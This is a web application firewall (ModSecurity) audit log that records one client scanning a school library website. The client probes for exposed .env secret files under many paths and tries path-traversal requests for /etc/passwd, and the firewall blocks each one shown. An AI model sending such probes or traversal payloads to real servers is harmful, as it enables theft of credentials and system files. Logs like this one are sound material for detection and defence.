403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cf07d92d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891128950435 770 (- - -) Stopwatch2: 1749891128950435 770; combined=320, p1=279, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf07d92d-Z-- --eec9ec19-A-- [14/Jun/2025:15:52:09 +0700] aE04OWmwZ6YUkjOdtI7-AQAAAAk 103.236.140.4 34436 103.236.140.4 8181 --eec9ec19-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458296 --eec9ec19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eec9ec19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891129849062 700 (- - -) Stopwatch2: 1749891129849062 700; combined=286, p1=252, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eec9ec19-Z-- --7e47d67c-A-- [14/Jun/2025:15:52:10 +0700] aE04OkMWfhkd5Y0sFtogugAAAIQ 103.236.140.4 34458 103.236.140.4 8181 --7e47d67c-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458304 --7e47d67c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7e47d67c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891130762450 768 (- - -) Stopwatch2: 1749891130762450 768; combined=310, p1=269, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e47d67c-Z-- --c74a561e-A-- [14/Jun/2025:15:52:11 +0700] aE04O2IDXuKmWNi2UBTnVAAAAEs 103.236.140.4 34480 103.236.140.4 8181 --c74a561e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458313 --c74a561e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c74a561e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891131804691 550 (- - -) Stopwatch2: 1749891131804691 550; combined=222, p1=194, p2=0, p3=0, p4=0, p5=27, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c74a561e-Z-- --04c1171d-A-- [14/Jun/2025:15:52:13 +0700] aE04PWmwZ6YUkjOdtI7-CwAAAAU 103.236.140.4 34518 103.236.140.4 8181 --04c1171d-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373494 --04c1171d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --04c1171d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891133723777 886 (- - -) Stopwatch2: 1749891133723777 886; combined=335, p1=296, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04c1171d-Z-- --f00de307-A-- [14/Jun/2025:15:52:14 +0700] aE04PkMWfhkd5Y0sFtogvgAAAIw 103.236.140.4 34540 103.236.140.4 8181 --f00de307-B-- GET /library/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373503 --f00de307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f00de307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891134583150 791 (- - -) Stopwatch2: 1749891134583150 791; combined=332, p1=290, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f00de307-Z-- --cc17b301-A-- [14/Jun/2025:15:52:16 +0700] aE04QGmwZ6YUkjOdtI7-FQAAAAA 103.236.140.4 34560 103.236.140.4 8181 --cc17b301-B-- GET /nextjs-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373512 --cc17b301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc17b301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891136114565 692 (- - -) Stopwatch2: 1749891136114565 692; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc17b301-Z-- --1cb6ef33-A-- [14/Jun/2025:15:52:18 +0700] aE04QmmwZ6YUkjOdtI7-HQAAABQ 103.236.140.4 34604 103.236.140.4 8181 --1cb6ef33-B-- GET /node-api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458363 --1cb6ef33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1cb6ef33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891138119092 705 (- - -) Stopwatch2: 1749891138119092 705; combined=298, p1=264, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cb6ef33-Z-- --7c18647e-A-- [14/Jun/2025:15:52:20 +0700] aE04RGmwZ6YUkjOdtI7-IQAAABg 103.236.140.4 34642 103.236.140.4 8181 --7c18647e-B-- GET /vendor/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458378 --7c18647e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7c18647e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891140109917 771 (- - -) Stopwatch2: 1749891140109917 771; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c18647e-Z-- --186bd275-A-- [14/Jun/2025:15:52:22 +0700] aE04RmmwZ6YUkjOdtI7-KAAAABE 103.236.140.4 34684 103.236.140.4 8181 --186bd275-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458396 --186bd275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --186bd275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891142251563 772 (- - -) Stopwatch2: 1749891142251563 772; combined=305, p1=266, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --186bd275-Z-- --72732e37-A-- [14/Jun/2025:15:52:23 +0700] aE04R0MWfhkd5Y0sFtogywAAAIk 103.236.140.4 34722 103.236.140.4 8181 --72732e37-B-- GET /myproject/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373575 --72732e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --72732e37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891143924199 694 (- - -) Stopwatch2: 1749891143924199 694; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72732e37-Z-- --1f9d625b-A-- [14/Jun/2025:15:52:24 +0700] aE04SEMWfhkd5Y0sFtogzAAAAIw 103.236.140.4 34738 103.236.140.4 8181 --1f9d625b-B-- GET /.envs/.production/.django HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373581 --1f9d625b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1f9d625b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891144919392 805 (- - -) Stopwatch2: 1749891144919392 805; combined=309, p1=275, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f9d625b-Z-- --09606166-A-- [14/Jun/2025:15:52:26 +0700] aE04SmmwZ6YUkjOdtI7-NQAAABE 103.236.140.4 34768 103.236.140.4 8181 --09606166-B-- GET /react-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373593 --09606166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09606166-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891146314882 673 (- - -) Stopwatch2: 1749891146314882 673; combined=234, p1=208, p2=0, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09606166-Z-- --20177466-A-- [14/Jun/2025:15:52:26 +0700] aE04SkMWfhkd5Y0sFtog0QAAAJI 103.236.140.4 34782 103.236.140.4 8181 --20177466-B-- GET /react-app/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373599 --20177466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --20177466-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891146902909 868 (- - -) Stopwatch2: 1749891146902909 868; combined=331, p1=294, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20177466-Z-- --bd8b7b2b-A-- [14/Jun/2025:15:52:43 +0700] aE04W2mwZ6YUkjOdtI7-bgAAABE 103.236.140.4 35094 103.236.140.4 8181 --bd8b7b2b-B-- GET /pdf-generator/?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373740 --bd8b7b2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bd8b7b2b-E-- --bd8b7b2b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /pdf-generator/?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891163246585 1579 (- - -) Stopwatch2: 1749891163246585 1579; combined=458, p1=337, p2=98, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd8b7b2b-Z-- --49696671-A-- [14/Jun/2025:15:52:43 +0700] aE04W2mwZ6YUkjOdtI7-cgAAAAk 103.236.140.4 35108 103.236.140.4 8181 --49696671-B-- GET /download.cgi?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373746 --49696671-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49696671-E-- --49696671-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.cgi?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891163644986 1783 (- - -) Stopwatch2: 1749891163644986 1783; combined=442, p1=353, p2=67, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49696671-Z-- --a3e58063-A-- [14/Jun/2025:15:52:44 +0700] aE04XEMWfhkd5Y0sFtog5gAAAIU 103.236.140.4 35126 103.236.140.4 8181 --a3e58063-B-- GET /somepath?path=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676749 --a3e58063-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a3e58063-E-- --a3e58063-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /somepath?path=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891164866133 2053 (- - -) Stopwatch2: 1749891164866133 2053; combined=606, p1=444, p2=131, p3=0, p4=0, p5=30, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3e58063-Z-- --58560c25-A-- [14/Jun/2025:15:52:47 +0700] aE04X2IDXuKmWNi2UBTnXwAAAEQ 103.236.140.4 35170 103.236.140.4 8181 --58560c25-B-- GET /admin/media/download_private_file?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373772 --58560c25-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --58560c25-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:file. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:file: ../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891167268467 2138 (- - -) Stopwatch2: 1749891167268467 2138; combined=884, p1=434, p2=324, p3=0, p4=0, p5=126, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58560c25-Z-- --09b7e21f-A-- [14/Jun/2025:15:52:49 +0700] aE04YWmwZ6YUkjOdtI7-ewAAAAY 103.236.140.4 35208 103.236.140.4 8181 --09b7e21f-B-- GET /download?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676785 --09b7e21f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09b7e21f-E-- --09b7e21f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891169107329 28711 (- - -) Stopwatch2: 1749891169107329 28711; combined=54238, p1=440, p2=112, p3=0, p4=0, p5=26858, sr=78, sw=0, l=0, gc=26828 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09b7e21f-Z-- --e3426c41-A-- [14/Jun/2025:15:52:50 +0700] aE04YmmwZ6YUkjOdtI7-hAAAAA8 103.236.140.4 35238 103.236.140.4 8181 --e3426c41-B-- GET /fileviewer?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373799 --e3426c41-F-- HTTP/1.1 403 Forbidden 